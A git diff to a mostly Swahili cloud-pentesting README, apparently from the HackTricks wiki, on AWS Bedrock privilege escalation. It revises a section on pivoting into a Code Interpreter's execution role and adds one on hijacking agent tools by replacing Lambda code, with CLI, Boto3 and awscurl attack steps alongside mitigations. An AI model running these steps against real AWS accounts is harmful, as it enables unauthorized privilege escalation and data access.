diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-bedrock-privesc/README.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-bedrock-privesc/README.md
index 14068f11c..1493a734d 100644
--- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-bedrock-privesc/README.md
+++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-bedrock-privesc/README.md
@@ -6,32 +6,32 @@
 
 ### `bedrock-agentcore:StartCodeInterpreterSession` + `bedrock-agentcore:InvokeCodeInterpreter` - Code Interpreter Execution-Role Pivot
 
-AgentCore Code Interpreter ni mazingira yaliyosimamiwa ya utekelezaji. **Custom Code Interpreters** zinaweza kusanidiwa na **`executionRoleArn`** ambayo "inatoa ruhusa kwa code interpreter kufikia huduma za AWS".
+AgentCore Code Interpreter ni mazingira ya utekelezaji yanayosimamiwa. **Custom Code Interpreters** zinaweza kusanidiwa na **`executionRoleArn`** ambayo “hutoa permissions kwa code interpreter kufikia AWS services”.
 
-Ikiwa **msemaji wa IAM mwenye ruhusa ndogo** anaweza **kuanza + kuita** kikao cha Code Interpreter kilichosanidiwa na **execution role yenye ruhusa zaidi**, mwito unaweza kwa ufanisi **pivot into the execution role’s permissions** (lateral movement / privilege escalation kulingana na upeo wa role).
+Ikiwa **lower-privileged IAM principal** anaweza **kianzisha + invoke** Code Interpreter session iliyosanidiwa na **more privileged execution role**, mwitaji anaweza kwa ufanisi **pivot** kwenda kwenye permissions za execution role hiyo (lateral movement / privilege escalation kutegemea scope ya role).
 
 > [!NOTE]
-> Hii kawaida ni suala la **misconfiguration / excessive permissions** (kutoa ruhusa kubwa kwa interpreter execution role na/au kutoa upatikanaji mpana wa invoke).
-> AWS kwa wazi inaonya kuepuka privilege escalation kwa kuhakikisha execution roles zina **ruhusa sawa au chache** kuliko vitambulisho vinavyoruhusiwa kuita.
+> Hii kwa kawaida ni suala la **misconfiguration / excessive permissions** (kutoa wide permissions kwa interpreter execution role na/au kutoa broad invoke access).
+> AWS inaonya wazi kuepuka privilege escalation kwa kuhakikisha execution roles zina **equal or fewer** privileges kuliko identities zinazoruhusiwa ku-invoke.
 
-#### Masharti ya awali (common misconfiguration)
+#### Preconditions (common misconfiguration)
 
-- A **custom code interpreter** inapatikana na **execution role** yenye ruhusa kupita kiasi (mfano: access to sensitive S3/Secrets/SSM or IAM-admin-like capabilities).
-- Mtumiaji (developer/auditor/CI identity) ana ruhusa za:
-  - start sessions: `bedrock-agentcore:StartCodeInterpreterSession`
-  - invoke tools: `bedrock-agentcore:InvokeCodeInterpreter`
-- (Hiari) Mtumiaji pia anaweza kuunda interpreters: `bedrock-agentcore:CreateCodeInterpreter` (inawaruhusu kuunda interpreter mpya iliyosanidiwa na execution role, kulingana na org guardrails).
+- Kuna **custom code interpreter** yenye over-privileged **execution role** (mfano: access kwa sensitive S3/Secrets/SSM au capabilities zinazofanana na IAM-admin).
+- Mtumiaji (developer/auditor/CI identity) ana permissions za:
+- start sessions: `bedrock-agentcore:StartCodeInterpreterSession`
+- invoke tools: `bedrock-agentcore:InvokeCodeInterpreter`
+- (Optional) Mtumiaji pia anaweza create interpreters: `bedrock-agentcore:CreateCodeInterpreter` (humruhusu kuunda interpreter mpya iliyosanidiwa na execution role, kutegemea guardrails za org).
 
 #### Recon (identify custom interpreters and execution role usage)
 
-List interpreters (control-plane) and inspect their configuration:
+Orodhesha interpreters (control-plane) na kagua configuration yao:
 ```bash
 aws bedrock-agentcore-control list-code-interpreters
 aws bedrock-agentcore-control get-code-interpreter --code-interpreter-id <CODE_INTERPRETER_ID>
-````
-> Amri ya create-code-interpreter inaunga mkono `--execution-role-arn` ambayo inaeleza ruhusa za AWS ambazo mfasiri atakuwa nazo.
+```
+> Amri ya create-code-interpreter inasaidia `--execution-role-arn` ambayo inafafanua ni ruhusa gani za AWS ambazo interpreter itakuwa nazo.
 
-#### Hatua 1 - Anzisha kikao (hii itarudisha `sessionId`, si interactive shell)
+#### Hatua ya 1 - Anzisha session (hii inarudisha `sessionId`, si interactive shell)
 ```bash
 SESSION_ID=$(
 aws bedrock-agentcore start-code-interpreter-session \
@@ -43,11 +43,11 @@ aws bedrock-agentcore start-code-interpreter-session \
 
 echo "SessionId: $SESSION_ID"
 ```
-#### Hatua 2 - Waalike utekelezaji wa msimbo (Boto3 au signed HTTPS)
+#### Hatua ya 2 - Invoke code execution (Boto3 or signed HTTPS)
 
-Hakuna **shell ya python ya mwingiliano** kutoka `start-code-interpreter-session`. Utekelezaji hufanyika kupitia **InvokeCodeInterpreter**.
+Hakuna **interactive python shell** kutoka `start-code-interpreter-session`. Execution hufanyika kupitia **InvokeCodeInterpreter**.
 
-**Chaguo A - mfano wa Boto3 (tekeleza Python + thibitisha utambulisho):**
+**Option A - Boto3 example (execute Python + verify identity):**
 ```python
 import boto3
 
@@ -68,9 +68,9 @@ arguments={
 for event in resp.get("stream", []):
 print(event)
 ```
-Iwapo interpreter imewekwa na execution role, matokeo ya `sts:GetCallerIdentity()` yanapaswa kuonyesha utambulisho wa role hiyo (si low-priv caller), ikionesha pivot.
+Kama interpreter imewekwa na execution role, output ya `sts:GetCallerIdentity()` inapaswa kuonyesha identity ya role hiyo (si low-priv caller), ikionyesha pivot.
 
-**Chaguo B - Mwito wa HTTPS uliosainiwa (awscurl):**
+**Option B - Signed HTTPS call (awscurl):**
 ```bash
 awscurl -X POST \
 "https://bedrock-agentcore.<Region>.amazonaws.com/code-interpreters/<CODE_INTERPRETER_IDENTIFIER>/tools/invoke" \
@@ -87,18 +87,86 @@ awscurl -X POST \
 }
 }'
 ```
-#### Impact
+#### Athari
 
-* **Lateral movement** kwa upatikanaji wowote wa AWS ambao interpreter execution role ina.
-* **Privilege escalation** ikiwa interpreter execution role ina ruhusa zaidi kuliko caller.
-* Kugundua kwa ugumu zaidi ikiwa CloudTrail data events kwa interpreter invocations hazijawezeshwa (invocations huenda zisirekodiwe kwa default, kulingana na usanidi).
+* **Lateral movement** ndani ya yoyote AWS access ambayo interpreter execution role inayo.
+* **Privilege escalation** ikiwa interpreter execution role ina privileges zaidi kuliko caller.
+* Ugunduzi mgumu zaidi ikiwa CloudTrail data events kwa interpreter invocations hazijawezeshwa (invocations huenda zisirekodiwe kwa default, kutegemea configuration).
 
 #### Mitigations / Hardening
 
-* **Least privilege** kwa interpreter `executionRoleArn` (itendwe kama Lambda execution roles / CI roles).
-* **Restrict who can invoke** (`bedrock-agentcore:InvokeCodeInterpreter`) na nani anayeweza kuanza sessions.
-* Tumia **SCPs** kuzuia InvokeCodeInterpreter isipokuwa kwa approved agent runtime roles (inaweza kuwa muhimu kutekeleza ngazi ya org).
-* Washa zinazofaa **CloudTrail data events** kwa AgentCore pale inapofaa; toa onyo juu ya invocations zisizotarajiwa na uundaji wa sessions.
+* **Least privilege** kwenye interpreter `executionRoleArn` (itende kama Lambda execution roles / CI roles).
+* **Restrict who can invoke** (`bedrock-agentcore:InvokeCodeInterpreter`) na nani anaweza kuanzisha sessions.
+* Tumia **SCPs** kukataa InvokeCodeInterpreter isipokuwa kwa approved agent runtime roles (org-level enforcement inaweza kuwa ya lazima).
+* Wezesha zinazofaa **CloudTrail data events** kwa AgentCore inapohitajika; toa alert kwa unexpected invocations na session creation.
+
+## Amazon Bedrock Agents
+
+### `lambda:UpdateFunctionCode`, `bedrock:InvokeAgent` - Agent Tool Hijacking via Lambda
+
+Bedrock Agents zinaweza kutumia **Lambda-backed action groups** kama tools (external execution). Ikiwa principal anaweza **modify code ya Lambda function inayotumiwa na agent**, na kisha akaweza **invoke agent**, anaweza ku-execute attacker-controlled code chini ya **Lambda execution role**.
+
+> [!NOTE]
+> Hii ni **cross-service trust abuse** (Bedrock → Lambda), si vulnerability. Attacker huenda asiweze ku-invoke Lambda moja kwa moja, lakini bado anaweza ku-trigger kupitia agent.
+
+#### Preconditions (common misconfiguration)
+
+- Kipo Bedrock Agent chenye **action group backed by a Lambda function**
+- Attacker ana:
+- `lambda:UpdateFunctionCode`
+- `bedrock:InvokeAgent`
+- Lambda execution role ina permissions pana zaidi kuliko attacker
+- Attacker anaweza kutambua Lambda inayotumiwa na agent
+
+#### Recon
+
+Enumerate agent action groups:
+```bash
+aws bedrock-agent list-agents
+aws bedrock-agent get-agent --agent-id <AGENT_ID>
+aws bedrock-agent list-agent-action-groups --agent-id <AGENT_ID> --agent-version DRAFT
+```
+Kagua Lambda:
+```bash
+aws lambda get-function --function-name <FUNCTION_NAME>
+```
+#### Utekelezaji
+
+Badilisha code ya Lambda:
+```bash
+zip payload.zip lambda_function.py
+
+aws lambda update-function-code \
+--function-name <FUNCTION_NAME> \
+--zip-file fileb://payload.zip
+```
+Mfano wa payload:
+```python
+import boto3
+
+def lambda_handler(event, context):
+return boto3.client("sts").get_caller_identity()
+```
+Tumia kupitia agent:
+```bash
+aws bedrock-agent-runtime invoke-agent \
+--agent-id <AGENT_ID> \
+--agent-alias-id <ALIAS_ID> \
+--session-id test \
+--input-text "trigger tool"
+```
+#### Athari
+
+* **Privilege escalation** kwenda Lambda execution role
+* **Data exfiltration** kutoka AWS services
+* **Cross-service abuse** kupitia trusted agent execution
+
+#### Mitigations
+
+* **Restrict** `lambda:UpdateFunctionCode`
+* Tumia Lambda roles za **least-privilege**
+* **Monitor** mabadiliko ya Lambda code
+* **Audit** matumizi ya Bedrock agent tool
 
 ## References
 
@@ -108,6 +176,7 @@ awscurl -X POST \
 - [AWS CLI: start-code-interpreter-session (returns `sessionId`)](https://docs.aws.amazon.com/cli/latest/reference/bedrock-agentcore/start-code-interpreter-session.html)
 - [AWS Dev Guide: Code Interpreter API reference examples (Boto3 + awscurl invoke)](https://docs.aws.amazon.com/bedrock-agentcore/latest/devguide/code-interpreter-api-reference-examples.html)
 - [AWS Dev Guide: Security credentials management (MMDS + privilege escalation warning)](https://docs.aws.amazon.com/bedrock-agentcore/latest/devguide/security-credentials-management.html)
+- [SoftwareSecured: AWS Privilege Escalation Techniques (Bedrock agent tool hijacking)](https://www.softwaresecured.com/post/aws-privilege-escalation-iam-risks-service-based-attacks-and-new-ai-driven-bedrock-agentcore-vectors)
 
 
 {{#include ../../../../banners/hacktricks-training.md}}